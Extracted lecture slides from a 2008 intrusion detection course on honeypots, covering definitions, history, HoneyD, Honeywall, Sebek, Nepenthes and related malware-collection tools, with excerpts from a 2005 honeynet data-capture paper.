definitions, intrusion detection systems€¦ · source: “taxonomy of honeypots", seifert,...
TRANSCRIPT
Intrusion DetectionSystems
Matthijs Koot([email protected])
Definitions,purpose
History
How honeypotsworkHoneyD
Honeynet, Honeywall
MWCollect: Nepenthes,HoneyTrap and HoneyBow
OutlookLimitations
Recent topics
Honeynet ResearchAlliance
Summary
Intrusion Detection SystemsLecture #4: Honeypots
Matthijs Koot([email protected])
Faculteit van Natuurwetenschappen, Wiskunde en InformaticaUniversiteit van Amsterdam
2008-04-10 / SNE-IDS college ’07-’08
Intrusion DetectionSystems
Matthijs Koot([email protected])
Definitions,purpose
History
How honeypotsworkHoneyD
Honeynet, Honeywall
MWCollect: Nepenthes,HoneyTrap and HoneyBow
OutlookLimitations
Recent topics
Honeynet ResearchAlliance
Summary
Outline
Definitions, purpose
History
How honeypots workHoneyDHoneynet, HoneywallMWCollect: Nepenthes, HoneyTrap and HoneyBow
OutlookLimitationsRecent topicsHoneynet Research Alliance
Intrusion DetectionSystems
Matthijs Koot([email protected])
Definitions,purpose
History
How honeypotsworkHoneyD
Honeynet, Honeywall
MWCollect: Nepenthes,HoneyTrap and HoneyBow
OutlookLimitations
Recent topics
Honeynet ResearchAlliance
Summary
Definitions: ‘honeypot’.
DefinitionA honeypot is a [sacrificial] security resource whosevalue lies in being probed, attacked or compromised.Source: “Honeypots: Tracking Hackers", Lance Spitzner, 2002 (book)
Intrusion DetectionSystems
Matthijs Koot([email protected])
Definitions,purpose
History
How honeypotsworkHoneyD
Honeynet, Honeywall
MWCollect: Nepenthes,HoneyTrap and HoneyBow
OutlookLimitations
Recent topics
Honeynet ResearchAlliance
Summary
Purpose of a honeypot.
The two main purposes of a honeypot:I Research
I Attract blackhatsI Reveal blackhat tactics, techniques, tools (KYE)I Reveal motives/intentions (?)I Mostly universities, governments, ISPs
I ProtectionI Deter blackhats from real assetsI Provide early warningI Mostly governments, large enterprises
I Purpose may determine honeypot functionality andarchitecture
Intrusion DetectionSystems
Matthijs Koot([email protected])
Definitions,purpose
History
How honeypotsworkHoneyD
Honeynet, Honeywall
MWCollect: Nepenthes,HoneyTrap and HoneyBow
OutlookLimitations
Recent topics
Honeynet ResearchAlliance
Summary
Definitions: ‘honeynet’ and ‘honeywall’.
DefinitionA honeynet is a network of [high-interaction] honeypots.
DefinitionA honeywall is a layer-2 bridge that is placed in-linebetween a network and a honeynet, or between anetwork and a honeypot, to uni- or bidirectionally capture,control and analyze attacks.
DefinitionA honeytoken is a honeypot which is not a computer.
Intrusion DetectionSystems
Matthijs Koot([email protected])
Definitions,purpose
History
How honeypotsworkHoneyD
Honeynet, Honeywall
MWCollect: Nepenthes,HoneyTrap and HoneyBow
OutlookLimitations
Recent topics
Honeynet ResearchAlliance
Summary
Warning.
WARNING
In real life, “Honeynet"/“honeynet" and“Honeywall"/“honeywall" are sometimes usedambiguously to refer to both their concepts, as well astheir prevalent implementation (think ‘DNS’ versus‘bind’). This also explains any inconsistencies in (my) useof CaPiTaLiZaTiOn.
Intrusion DetectionSystems
Matthijs Koot([email protected])
Definitions,purpose
History
How honeypotsworkHoneyD
Honeynet, Honeywall
MWCollect: Nepenthes,HoneyTrap and HoneyBow
OutlookLimitations
Recent topics
Honeynet ResearchAlliance
Summary
Psychology behind a honeypot.
In its protective form, a honeypot is designed ondeception and intimidation (Fred Cohen, 2001):
I ConcealmentI CamouflageI False/planted information (honeytokens)I Feints, lies, et cetera
I E.g. false claims that a facility if being watched bylaw enforcement authorities
Intrusion DetectionSystems
Matthijs Koot([email protected])
Definitions,purpose
History
How honeypotsworkHoneyD
Honeynet, Honeywall
MWCollect: Nepenthes,HoneyTrap and HoneyBow
OutlookLimitations
Recent topics
Honeynet ResearchAlliance
Summary
Functional requirements of a honeypot.
Functional requirements of a honeypot include:I Data control (important!)I Data captureI Data collection (for large-scale honeynets)I Data analysis
Intrusion DetectionSystems
Matthijs Koot([email protected])
Definitions,purpose
History
How honeypotsworkHoneyD
Honeynet, Honeywall
MWCollect: Nepenthes,HoneyTrap and HoneyBow
OutlookLimitations
Recent topics
Honeynet ResearchAlliance
Summary
Taxonomy of honeypots.
Honeypots may be distinguished by their properties:I Level of interactivityI Data captureI Containment (= ‘data control’)I Distribution appearanceI Role in N-tier architectureI Communication interface (API, NIC, ...)
Source: “Taxonomy of Honeypots", Seifert, Welch & Komisarczuk, 2006
Intrusion DetectionSystems
Matthijs Koot([email protected])
Definitions,purpose
History
How honeypotsworkHoneyD
Honeynet, Honeywall
MWCollect: Nepenthes,HoneyTrap and HoneyBow
OutlookLimitations
Recent topics
Honeynet ResearchAlliance
Summary
Taxonomy of honeypots.
Honeypot
Communication interface
Distribution appearance
Role in an N-tier architecture
Data captureContainment
Interaction level
High Low
Software API Non Network Hardware IF Network IF
Client Server
Defuse
Block
Slowdown
None
Intrusions
Events
Attacks
None
Distributed Stand-alone
Intrusion DetectionSystems
Matthijs Koot([email protected])
Definitions,purpose
History
How honeypotsworkHoneyD
Honeynet, Honeywall
MWCollect: Nepenthes,HoneyTrap and HoneyBow
OutlookLimitations
Recent topics
Honeynet ResearchAlliance
Summary
Level of interactivity: low.
Fake daemon
Operating System
Other local resources
harddisk
Reconstructed from source: “Honeypots", R. Baumann, C. Plattern (diploma thesis), 2002
Intrusion DetectionSystems
Matthijs Koot([email protected])
Definitions,purpose
History
How honeypotsworkHoneyD
Honeynet, Honeywall
MWCollect: Nepenthes,HoneyTrap and HoneyBow
OutlookLimitations
Recent topics
Honeynet ResearchAlliance
Summary
Level of interactivity: mid.
Fake daemon
Operating System
Other local resources
harddisk
Reconstructed from source: “Honeypots", R. Baumann, C. Plattern (diploma thesis), 2002
Intrusion DetectionSystems
Matthijs Koot([email protected])
Definitions,purpose
History
How honeypotsworkHoneyD
Honeynet, Honeywall
MWCollect: Nepenthes,HoneyTrap and HoneyBow
OutlookLimitations
Recent topics
Honeynet ResearchAlliance
Summary
Level of interactivity: high.
Fake daemon
Operating System
Other local resources
harddisk
Reconstructed from source: “Honeypots", R. Baumann, C. Plattern (diploma thesis), 2002
Intrusion DetectionSystems
Matthijs Koot([email protected])
Definitions,purpose
History
How honeypotsworkHoneyD
Honeynet, Honeywall
MWCollect: Nepenthes,HoneyTrap and HoneyBow
OutlookLimitations
Recent topics
Honeynet ResearchAlliance
Summary
History of honeypots.
I 1990: real systemsI Deploy unpatched systems in default config on
unprotected network (‘low-hanging fruit’)I Easy to deployI High-interaction, high-riskI Nice reading: “Cuckoo’s Egg” by Clifford Stoll
I 1998: service/OS emulationI Deception Toolkit, CyberCop Sting, KFSensor,
SpecterI Easy to deployI Low-interaction, low-risk
I 1999-current: virtual systemsI HoneyD, Honeywall, Qdetect, Symantec Decoy
Server (≈’03/’04)I Less easy to deployI Mid/high-interaction, mid/high-risk
Intrusion DetectionSystems
Matthijs Koot([email protected])
Definitions,purpose
History
How honeypotsworkHoneyD
Honeynet, Honeywall
MWCollect: Nepenthes,HoneyTrap and HoneyBow
OutlookLimitations
Recent topics
Honeynet ResearchAlliance
Summary
History of the Honeynet Project.
History of the Honeynet ProjectI 1999: Lance Spitzner (Sun) founds Honeynet projectI 1999-2001, GenI: PoC, L3+ (modified IP-headers)I 2001-2003, GenII: GenI + bridging (no TTL, harder
to detect)I 2003: Release of Eeyore Honeywall CD-ROM
I 2003-current, GenIII: GenII + blocking (Honeywall)I 2005: Release of Roo Honeywall CD-ROM
I future: ‘GenIV’ refers to next-gen analysiscapabilities
Honeynet.org is home to the ‘KYE papers’ and has manyrefs to academic work! They are also known for the Scanof the Month (SotM) challenges, which alas appear tohave stopped in 2005.
Intrusion DetectionSystems
Matthijs Koot([email protected])
Definitions,purpose
History
How honeypotsworkHoneyD
Honeynet, Honeywall
MWCollect: Nepenthes,HoneyTrap and HoneyBow
OutlookLimitations
Recent topics
Honeynet ResearchAlliance
Summary
Outline
Definitions, purpose
History
How honeypots workHoneyDHoneynet, HoneywallMWCollect: Nepenthes, HoneyTrap and HoneyBow
OutlookLimitationsRecent topicsHoneynet Research Alliance
Intrusion DetectionSystems
Matthijs Koot([email protected])
Definitions,purpose
History
How honeypotsworkHoneyD
Honeynet, Honeywall
MWCollect: Nepenthes,HoneyTrap and HoneyBow
OutlookLimitations
Recent topics
Honeynet ResearchAlliance
Summary
HoneyD.
HoneyDI Run multiple virtual IP-stacks in parallel (+ routing)I Mid-interaction OS/service emulator
I Emulates SMTP, FTP, HTTP, ...I Easily extendible through customizable scripts
I TCP/IP fingerprint spoofing through ‘personalities’I Impersonate Win32 on your favorite UNIX flavor
(which should be MINIX), fooling nmap and xprobeI Fake WinSize, DF, ToS, ISN, ...I Fake packet loss, TTL, latency
I First released in 2002 by Niels Provos (the guy fromoutguess/stegdetect)
Intrusion DetectionSystems
Matthijs Koot([email protected])
Definitions,purpose
History
How honeypotsworkHoneyD
Honeynet, Honeywall
MWCollect: Nepenthes,HoneyTrap and HoneyBow
OutlookLimitations
Recent topics
Honeynet ResearchAlliance
Summary
HoneyD.
HoneyD architecture
libnet
libpcap
Personality engine
Userland IP-stack
ICMP
UDP
TCP
Service
External program
proxy
HoneyD
Reconstructed from source: http://md.hudora.de/presentations/2005-bh-honeypots-03-honeyd.pdf
Intrusion DetectionSystems
Matthijs Koot([email protected])
Definitions,purpose
History
How honeypotsworkHoneyD
Honeynet, Honeywall
MWCollect: Nepenthes,HoneyTrap and HoneyBow
OutlookLimitations
Recent topics
Honeynet ResearchAlliance
Summary
HoneyD.
Applying the mid-interaction model to HoneyD: HoneyDservicing incoming requests on port TCP/21 by executingfake-ftpd.sh.
HoneyD listening on tcp/21
Operating System
Other local resources
fake-ftpd.sh
Intrusion DetectionSystems
Matthijs Koot([email protected])
Definitions,purpose
History
How honeypotsworkHoneyD
Honeynet, Honeywall
MWCollect: Nepenthes,HoneyTrap and HoneyBow
OutlookLimitations
Recent topics
Honeynet ResearchAlliance
Summary
Outline
Definitions, purpose
History
How honeypots workHoneyDHoneynet, HoneywallMWCollect: Nepenthes, HoneyTrap and HoneyBow
OutlookLimitationsRecent topicsHoneynet Research Alliance
Intrusion DetectionSystems
Matthijs Koot([email protected])
Definitions,purpose
History
How honeypotsworkHoneyD
Honeynet, Honeywall
MWCollect: Nepenthes,HoneyTrap and HoneyBow
OutlookLimitations
Recent topics
Honeynet ResearchAlliance
Summary
Honeynet, Honeywall.
The basic idea of a Honeynet/Honeywall:
17
Theory
Internet
Honeywall
Honeypot
Honeypot
No Restrictions
Connections Limited Packet Scrubbed
Source: http://assert.uaf.edu/workshop06/slides/rdodge.pdf
Intrusion DetectionSystems
Matthijs Koot([email protected])
Definitions,purpose
History
How honeypotsworkHoneyD
Honeynet, Honeywall
MWCollect: Nepenthes,HoneyTrap and HoneyBow
OutlookLimitations
Recent topics
Honeynet ResearchAlliance
Summary
Sebek.
Sebek: spying on your intruderI Honeynet.org: “Sebek is a tool designed for data
capture, it attempts to capture most of the attackersactivity on the honeypot, without the attackerknowing it (hopefully), then sends the recovered datato a central logging system."
I Linux kernel module that hooks sys_read()I Covertly sends captured data to honeywall (UDP)I Recovers keystrokes, uploaded files, passwords, IRC
chats, even if they’re encrypted by SSH, IPSec orSSL.
Intrusion DetectionSystems
Matthijs Koot([email protected])
Definitions,purpose
History
How honeypotsworkHoneyD
Honeynet, Honeywall
MWCollect: Nepenthes,HoneyTrap and HoneyBow
OutlookLimitations
Recent topics
Honeynet ResearchAlliance
Summary
Sebek.
Source: “Know Your Enemy: Sebek - A kernel based data capture tool", Honeynet Project, 2003
Intrusion DetectionSystems
Matthijs Koot([email protected])
Definitions,purpose
History
How honeypotsworkHoneyD
Honeynet, Honeywall
MWCollect: Nepenthes,HoneyTrap and HoneyBow
OutlookLimitations
Recent topics
Honeynet ResearchAlliance
Summary
Sebek in GenII honeynet.
Proceedings of the 2005 IEEEWorkshop on Information Assurance and Security
T1B2 1555 United States Military Academy, West Point, NY, 15 – 17 June2004
Towards a Third Generation Data Capture Architecture for Honeynets
Edward Balas and Camilo VieccoAdvanced Network Management Lab
Indiana University
Abstract— Honeynets have become an important tool forresearchers and network operators. However, their e!ec-tiveness has been impeded by a lack of a standard unifiedhoneynet data model which results from having multiple un-related data sources, each with its own access method andformat.
In this paper we propose a new data collection architec-ture that addresses the need for both rapid comprehensionand detailed analysis by providing two data access methods:a relational model based fast path, and a canonical slowpath. We also present a set of tools based on this architec-ture.
I. Introduction
A Honeynet is a network of high interaction honey-pots[1]. High interaction honeypots are quite different fromlow interaction honeypots such as Honeyd [2] for they pro-vide a full operating system and set of software for an in-truder to interact with. This high level of interactivity is adesired because it allows researchers the ability to observethe behavior of an intruder in a live system, and not a sim-ulation. As a result, high interaction honeypots are wellsuited to capture new or unanticipated activity. However,high interaction honeypots collect a larger volume detaileddata from multiple data sources making it difficult to man-age honeynets and make sense of the collected data.
To help facilitate honeynet deployments and the sharingof information between researchers, The Honeynet Projectstandardized the GenII honeynet architecture[3]. This ar-chitecture includes a specification of Data Capture proce-dures whose purpose is to “log all of the attacker’s activity”.The GenII Data Capture procedures specify the collectionof three types of data: firewall logs, network traffic andsystem activity. Figure 2 provides a schematic represen-tation of a typical Gen II deployment. This architecturedoes not provide any guidance on how to store or accessthe captured data.
In the standardized architecture, firewall logs are usedto provide a summary of the network activity. The“rc.firewall” script provided by the honeynet project al-lows this by using the Linux IPTables[4] connection track-ing capabilities. We feel this logging is counter-intuitivebecause firewall logs are typically used for policy auditingand in this case they are being used to provide summary
Fig. 1. GenII Honeynet Data Capture.
accounts of network activity. In addtion, these summarieslack needed detail such as the duration and quantity ofnetwork activity
Network traffic and Intrusion Detection System(IDS)events are captured using the Snort IDS system[5]. ForData Capture, two instances of are executed, one to merelyrecord the raw traffic, and the other to examine the net-work traffic looking for events that are indicative of misuseor intrusion.
System activity refers to monitoring activity from theperspective of each high interaction honeypot. This typeof monitoring includes two types of data: Syslog and Se-bek. Syslog data is provided by each honeypot’s operatingsystem. Sebek is a tool developed by the Honeynet Projectto monitor the behavior of intruder even when the intruderuses session encryption[6]. Sebek operates as hidden ker-nel module which covertly exports log data to the loggingsystem.
The GenII honeynet architecture gathers very detailed
1
Source: “Towards a Third Generation Data Capture Architecture for Honeynets", Balas & Viecco, 2005
Intrusion DetectionSystems
Matthijs Koot([email protected])
Definitions,purpose
History
How honeypotsworkHoneyD
Honeynet, Honeywall
MWCollect: Nepenthes,HoneyTrap and HoneyBow
OutlookLimitations
Recent topics
Honeynet ResearchAlliance
Summary
Hflowd data fusion (Perl script).
To augment our understanding of the network activ-ity and the hosts at either side of a communication, weadded passive operating system fingerprinting capability,provided by the p0f[13] tool. P0f is also a pcap basedmonitor that provides an estimate of the operating sys-tem(OS) used by host that initiates a TCP connection.This data is useful for two reasons. First, across flows itallows one to see if the apparent host OS is changing for agiven IP source providing an indication that the host mightbe behind a NAT. Second, OS identification can improvethe accuracy of IDS events through the process of passivealert verification[14][15]. For instance in a situation wherea apache mod ssl exploit[16] is launched against a non-linuxhost, the system could detect this discrepancy and treat thealert with a lower priority similar to the approach taken byRNA[14]2.
The addition of the Argus and p0f data to the Snortand packet capture data provides a more comprehensiverepresentation of events than provided in the GenII design.Further this new data can be organized around the conceptof a network flow. However additional data sources areneeded to bridge the relational gap between the networkflows and processes on a host.
To bridge this gap we enhanced Sebek [6] to monitor net-work activity from the host’s perspective. Sebek is a kernelbased data capture tool designed to be installed on high in-teraction honeypots [1]. Balas modified Sebek to monitorsocket, process and file activity [17]. These modificationsprovided three necessary capabilities.
First, Sebek was enhanced to monitor socket activity.Whenever a honeypot accepts or creates a network con-nection, Sebeck records the IP level attributes as well asthe corresponding host, process and inode. This allowsus to relate a network flow to the specific open inode andfile descriptor used by a process to service the connection.This data is integral to providing a composite view of theincident that transcends flow and host data. Once a net-work connection associated with an intrusion attempt is ob-served, we immediately know which inode and process theintrusion was tied to. Using this data we can quickly iden-tify related information such as the keystrokes captured bySebek.
Second, Sebek was enhanced to monitor process creation.This monitoring allows us to relate one process to another,rebuilding the process tree. This is important in intru-sion analysis for it allows us to track the intrusion forwardfrom the point of intrusion identifying all processes cre-ated, and any other causally related system activity, suchas outbound network connections[8]. The same capabilitycan be used in reverse, if we see an outbound connectionon a honeypot, we can back track to identify the point of
2p0f can only estimate the OS of the TCP initiator, in this examplethe OS of the host under attack is known by either manually intro-duction of the OS by part of the administrator as with a honeypot orthrough previous TCP connections initiated by the particular host
Honeynet Ethernet
Raw Socket
libpcap
P0f
Passive
OS
detector
Snort
Intrusion
Detection
System
Argus
Flow Monitor
Sebek
Data Collector
Traffic
Recorder
Hflowd: Data Fusion
Relational Data Access Raw Data Access
Deamons
Kernel
Hflow DB Pcap
Fig. 3. Data collection and fusion diagram
intrusion.Lastly, the ability to monitor the opening of files was
added. Coupled with the process tree this allows us to iden-tify all files accessed as part of an intrusion. This knowledgecan in turn be used to prioritize data analysis e!orts. Asan example, presume that a specific intruder likes to placehis/her files in a unique location in the file system. Oncethis location is identified, we can quickly search preexistingdata for any prior indications of the same intruder’s pres-ence. This capability can also be used to create a crudeform of Honeytoken[18] where the act of accessing a cer-tain file might be deemed an interesting event requiringfurther investigation.
B. Data Fusion
Hflow was developed to combine each of these datasources into a composite relational model. It continuallyconsumes data from each source, fusing it based on iden-tifiable relationships and it then loads this data into adatabase.
Hflow receives Argus flow, Snort IDS, p0f OS fingerprintsand Sebek data. This data once combined is then insertedinto a database.
Flow related data, such as Argus and Snort, are corre-lated based on corresponding tuples consisting of the IPprotocol number, the source and destination IP addressesand if applicable port numbers which fall within the same
4
Intrusion DetectionSystems
Matthijs Koot([email protected])
Definitions,purpose
History
How honeypotsworkHoneyD
Honeynet, Honeywall
MWCollect: Nepenthes,HoneyTrap and HoneyBow
OutlookLimitations
Recent topics
Honeynet ResearchAlliance
Summary
Outline
Definitions, purpose
History
How honeypots workHoneyDHoneynet, HoneywallMWCollect: Nepenthes, HoneyTrap and HoneyBow
OutlookLimitationsRecent topicsHoneynet Research Alliance
Intrusion DetectionSystems
Matthijs Koot([email protected])
Definitions,purpose
History
How honeypotsworkHoneyD
Honeynet, Honeywall
MWCollect: Nepenthes,HoneyTrap and HoneyBow
OutlookLimitations
Recent topics
Honeynet ResearchAlliance
Summary
MWCollect: Nepenthes, HoneyTrap andHoneyBow.
MWCollectI MWCollect (sort of) is an alliance of malware
researchers and software engineersI ...and less pretty, it is the dead parent process from
which Nepenthes was forkedI Home to Nepenthes, HoneyTrap and HoneyBowI State-of-art (scientific) research on malware
I Reverse engineering polymorphic shellcodesI Call-flow graph (binary) analysisI Et cetera
Intrusion DetectionSystems
Matthijs Koot([email protected])
Definitions,purpose
History
How honeypotsworkHoneyD
Honeynet, Honeywall
MWCollect: Nepenthes,HoneyTrap and HoneyBow
OutlookLimitations
Recent topics
Honeynet ResearchAlliance
Summary
Nepenthes.
NepenthesI Malware-collecting mid-interaction honeypotI Emulates known vulnerabilities and captures the
malware trying to exploit themI E.g. NetDDE, LSASS, DCOM, ASN1, MSSQL,
UPNP, IIS vulnsI Modular arch: vuln-*, shellcode-*, download-*,
submit-*I Extensions are being developed for call-flow graphs
and binary shellcode analysisI First released in 2006 by Paul Baecher et al.
Intrusion DetectionSystems
Matthijs Koot([email protected])
Definitions,purpose
History
How honeypotsworkHoneyD
Honeynet, Honeywall
MWCollect: Nepenthes,HoneyTrap and HoneyBow
OutlookLimitations
Recent topics
Honeynet ResearchAlliance
Summary
Nepenthes.
Nepenthes
tcp/445
tcp/135
tcp/80
tcp/...
Nepenthes core
geolocation-hostip
module-portwatch
vuln-lsass
vuln-dcom
vuln-asn1
vuln-wins
...
log-download log-irc dnsresolve-adns
geolocation-geoip
EXPLOIT
shellcode-generic
shellemu-winnt
PAYLOAD
download-tftp
download-ftp
download-http
download-link
MALWARE URL
...
submit-file
submit-xmlrpc
submit-norman
MALWARE!
Source: “The Nepenthes Platform: An Efficient Approach to Collect Malware", Baecher et al., 2006
Intrusion DetectionSystems
Matthijs Koot([email protected])
Definitions,purpose
History
How honeypotsworkHoneyD
Honeynet, Honeywall
MWCollect: Nepenthes,HoneyTrap and HoneyBow
OutlookLimitations
Recent topics
Honeynet ResearchAlliance
Summary
HoneyTrap and HoneyBow.
HoneyTrapI Low-interaction malware collection honeypotI HoneyTrap binds to (all!) unbound TCP ports, and
listensI Does not emulate vulns or services, although the
latter is possible through plug-insI Aimed at catching 0-days (unlike Nepenthes)
HoneyBowI High-interaction malware collection honeypotI Announced in Dec/2006 by China Honeynet ProjectI Modular arch: MwWatcher, MwFetcher, MwSubmitterI Claimed it will interoperate with Nepenthes
Intrusion DetectionSystems
Matthijs Koot([email protected])
Definitions,purpose
History
How honeypotsworkHoneyD
Honeynet, Honeywall
MWCollect: Nepenthes,HoneyTrap and HoneyBow
OutlookLimitations
Recent topics
Honeynet ResearchAlliance
Summary
Outline
Definitions, purpose
History
How honeypots workHoneyDHoneynet, HoneywallMWCollect: Nepenthes, HoneyTrap and HoneyBow
OutlookLimitationsRecent topicsHoneynet Research Alliance
Intrusion DetectionSystems
Matthijs Koot([email protected])
Definitions,purpose
History
How honeypotsworkHoneyD
Honeynet, Honeywall
MWCollect: Nepenthes,HoneyTrap and HoneyBow
OutlookLimitations
Recent topics
Honeynet ResearchAlliance
Summary
Limitations.
Limitations/caveats in honeypot technologyI Complexity is the enemy of security, and honeynets
are complex.I Bugs in emulatorsI Bugs in data capture/analysis/control toolsI Privilege escalation / jailbreak
I Known attacks: NoSEBrEaK, (unoffical) Phrack#62/0x07 (Local Honeypot Identification).
I Decoy/false attacks (counter-counter, etc.).I Blackhats exchange and evade IP-ranges of known
honeynetsI Auto(re)configuration, higher volatility might help
Intrusion DetectionSystems
Matthijs Koot([email protected])
Definitions,purpose
History
How honeypotsworkHoneyD
Honeynet, Honeywall
MWCollect: Nepenthes,HoneyTrap and HoneyBow
OutlookLimitations
Recent topics
Honeynet ResearchAlliance
Summary
Outline
Definitions, purpose
History
How honeypots workHoneyDHoneynet, HoneywallMWCollect: Nepenthes, HoneyTrap and HoneyBow
OutlookLimitationsRecent topicsHoneynet Research Alliance
Intrusion DetectionSystems
Matthijs Koot([email protected])
Definitions,purpose
History
How honeypotsworkHoneyD
Honeynet, Honeywall
MWCollect: Nepenthes,HoneyTrap and HoneyBow
OutlookLimitations
Recent topics
Honeynet ResearchAlliance
Summary
Recent topics.
I HoneysnapI CLI tool for high-level analysis of captured dataI honeysnap -c honeynet.cfg myfile.pcap
I Unified Data Analysis Framework (UDAF)I Library for data acquisition, filtering, fusion, reporting,
et cetera (towards visual programming)I Let’s hope it’ll be interoperable with IDMEF / GOTEK
I Sandboxes: CWSandbox, Norman, SandboxieI SCADA honeynets
I Cisco CIAG: scadahoneynet.sf.netI PLC emulation; MODBUS, DNP
I Client honeypots: honeyclient, Capture-HPC,HoneyC, SpyBye
I Honeystick, Google Hack Honeypot
Intrusion DetectionSystems
Matthijs Koot([email protected])
Definitions,purpose
History
How honeypotsworkHoneyD
Honeynet, Honeywall
MWCollect: Nepenthes,HoneyTrap and HoneyBow
OutlookLimitations
Recent topics
Honeynet ResearchAlliance
Summary
Honeypot classification.
Source: “Taxonomy of Honeypots", Seifert, Welch & Komisarczuk, 2006
Intrusion DetectionSystems
Matthijs Koot([email protected])
Definitions,purpose
History
How honeypotsworkHoneyD
Honeynet, Honeywall
MWCollect: Nepenthes,HoneyTrap and HoneyBow
OutlookLimitations
Recent topics
Honeynet ResearchAlliance
Summary
Outline
Definitions, purpose
History
How honeypots workHoneyDHoneynet, HoneywallMWCollect: Nepenthes, HoneyTrap and HoneyBow
OutlookLimitationsRecent topicsHoneynet Research Alliance
Intrusion DetectionSystems
Matthijs Koot([email protected])
Definitions,purpose
History
How honeypotsworkHoneyD
Honeynet, Honeywall
MWCollect: Nepenthes,HoneyTrap and HoneyBow
OutlookLimitations
Recent topics
Honeynet ResearchAlliance
Summary
Honeynet Research Alliance.
Honeynet Research AllianceI “The Honeynet Research Alliance is a trusted forum
of other honeypot research organizations. [...] Theseorganizations subscribe to the Alliance for thepurpose of researching, developing and deployinghoneypot related technologies and sharing thelessons learned."
Intrusion DetectionSystems
Matthijs Koot([email protected])
Definitions,purpose
History
How honeypotsworkHoneyD
Honeynet, Honeywall
MWCollect: Nepenthes,HoneyTrap and HoneyBow
OutlookLimitations
Recent topics
Honeynet ResearchAlliance
Summary
Honeynet Research Alliance (map).
NL is still not represented. Why?
Intrusion DetectionSystems
Matthijs Koot([email protected])
Definitions,purpose
History
How honeypotsworkHoneyD
Honeynet, Honeywall
MWCollect: Nepenthes,HoneyTrap and HoneyBow
OutlookLimitations
Recent topics
Honeynet ResearchAlliance
Summary
Summary
Topics that have been discussedI Definition, purpose, taxonomyI Tools: HoneyD, Honeywall, Sebek, NepenthesI Limitations, recent topics
Intrusion DetectionSystems
Matthijs Koot([email protected])
Definitions,purpose
History
How honeypotsworkHoneyD
Honeynet, Honeywall
MWCollect: Nepenthes,HoneyTrap and HoneyBow
OutlookLimitations
Recent topics
Honeynet ResearchAlliance
Summary
Feedback!
QuestionsQuestions regarding this lecture?
Lab assignments (deadline = April 14th):http://os3.nl/2007-2008/courses/ids/practica_bij_10_april
These slides will be uploaded here:http://os3.nl/2007-2008/courses/ids/